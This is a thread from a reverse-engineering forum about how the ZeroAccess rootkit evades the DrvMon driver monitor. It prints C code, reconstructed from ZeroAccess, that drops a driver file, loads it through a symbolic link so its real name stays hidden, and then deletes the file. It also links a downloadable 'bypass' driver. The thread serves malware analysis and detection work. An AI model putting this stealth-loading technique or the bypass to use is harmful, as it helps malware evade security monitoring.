A forum for reverse engineering, OS internals and malware analysis
When next version will be published? soon will year passed after this
This kind of spoofing is not handled by current available 1.2 version. As well as load-from-header.
All these resolved in v2.0 that is ready for about 1 month.
kmd wrote:When next version will be published? soon will year passed after thisWe decided to do not release newer version (2.x) to the public. Overall it's now completely different application than that attached here.This kind of spoofing is not handled by current available 1.2 version. As well as load-from-header.
All these resolved in v2.0 that is ready for about 1 month.
Ring0 - the source of inspiration
Haven't followed this thread in forever but now have seen talk of this Zero Access Trojan/RK "spoofing" ImageInfo->FileName unicode_string ? I don't have a sample of this but wouldn't this driver logically still need to be loaded prior to DrvMon running and other such tools??? Anyhow, instead of using ImageInfo->FileName directly one could, if the flag for ExtendedInfoPresent in passed ImageInfo is set, use the IMAGE_INFO_EX structure instead which provides a FILE_OBJECT pointer to the driver, ObQueryNameString on file object pointer and the driver name should be revealed? Of course, this could be "spoofed" too but perhaps with more work? My suggested bypass doesn't need "kernel mode" help, it is a PE optionalheader structure member that changes and complicates things, so I am curious to see what ZA is doing. Reverser comments welcomed ;)
P.S> My bypass driver link updated due to being a dead download link, thanks to xqrzd for pointing this out
http://uploading.com/files/6cd371e8/Bypass.sys
P.S> My bypass driver link updated due to being a dead download link, thanks to xqrzd for pointing this out
http://uploading.com/files/6cd371e8/Bypass.sys
Accept nothing less than STATUS_SUCCESS
Brock wrote:Haven't followed this thread in forever but now have seen talk of this Zero Access Trojan/RK "spoofing" ImageInfo->FileName unicode_string ? I don't have a sample of this but wouldn't this driver logically still need to be loaded prior to DrvMon running and other such tools??? Anyhow, instead of using ImageInfo->FileName directly one could, if the flag for ExtendedInfoPresent in passed ImageInfo is set, use the IMAGE_INFO_EX structure instead which provides a FILE_OBJECT pointer to the driver, ObQueryNameString on file object pointer and the driver name should be revealed? Of course, this could be "spoofed" too but perhaps with more work? My suggested bypass doesn't need "kernel mode" help, it is a PE optionalheader structure member that changes and complicates things, so I am curious to see what ZA is doing. Reverser comments welcomed ;)
Code: Select all
do not know how latest ZA doing this, but ZA from 2011 was working that way. Expand and decode symlink (could be multiple A->B->...->Z) and that is all.BOOL LoadDriverZAccess(
PWSTR DriverName,
PWSTR RegistryPath,
PBYTE BinaryBuffer,
ULONG BinaryBufferSize,
PNTSTATUS pStatus
)
{
BOOL result = FALSE;
NTSTATUS ns = STATUS_UNSUCCESSFUL;
UNICODE_STRING drvname;
UNICODE_STRING str1;
OBJECT_ATTRIBUTES attr;
HANDLE Link;
__try {
RtlSecureZeroMemory(tmpBuffer, BUFFER_SIZE);
wcscpy(tmpBuffer, L"\\??\\");
if (GetSystemDirectory(&tmpBuffer[4], MAX_PATH)) {
wcscat(tmpBuffer, L"\\drivers\\");
wcscat(tmpBuffer, DriverName);
ns = (NTSTATUS)NativeWriteBufferToFile(
&tmpBuffer[4],
BinaryBuffer,
BinaryBufferSize,
FALSE,
FALSE
);
if (NT_SUCCESS(ns)) {
RtlInitUnicodeString(&str1, L"\\*");
RtlInitUnicodeString(&drvname, tmpBuffer);
InitializeObjectAttributes(&attr, &str1, OBJ_CASE_INSENSITIVE, 0, NULL);
ns = NtCreateSymbolicLinkObject(&Link, SYMBOLIC_LINK_ALL_ACCESS, &attr, &drvname);
if (NT_SUCCESS(ns)) {
ns = NativeLoadDriver(TEXT("\\*"), RegistryPath, NULL);
result = NT_SUCCESS(ns);
NtClose(Link);
}
RtlInitUnicodeString(&drvname, tmpBuffer);
InitializeObjectAttributes(&attr, &drvname, OBJ_CASE_INSENSITIVE, 0, NULL);
NtDeleteFile(&attr);
}
}
if (pStatus)
*pStatus = ns;
} __except (EXCEPTION_EXECUTE_HANDLER) {
result = FALSE;
}
return result;
}IMAGE_INFO_EX is unavailable prior to Vista.
Ring0 - the source of inspiration
@EP_X0FF,
Thanks for the pseudo-code for loading its driver, interesting indeed. Would it be impolite of me to request a sample of ZA (doesn't matter which variant) if you have one? If it's too sensitive perhaps via private message?
IMAGE_INFO_EX is unavailable prior to Vista.Yes, I am aware of this as I still run XP 32-bit natively but even now Vista is old too :lol:
Thanks for the pseudo-code for loading its driver, interesting indeed. Would it be impolite of me to request a sample of ZA (doesn't matter which variant) if you have one? If it's too sensitive perhaps via private message?
Accept nothing less than STATUS_SUCCESS
Ring0 - the source of inspiration
Support WIN64 now?
The woman of my avatar: MiYue, the first empress dowager of China. In the TV series "The Legend of MiYue", my favourite movie star SunLi plays MiYue.
m5home wrote:Support WIN64 now?Yes, win8 too, about year ago.
Ring0 - the source of inspiration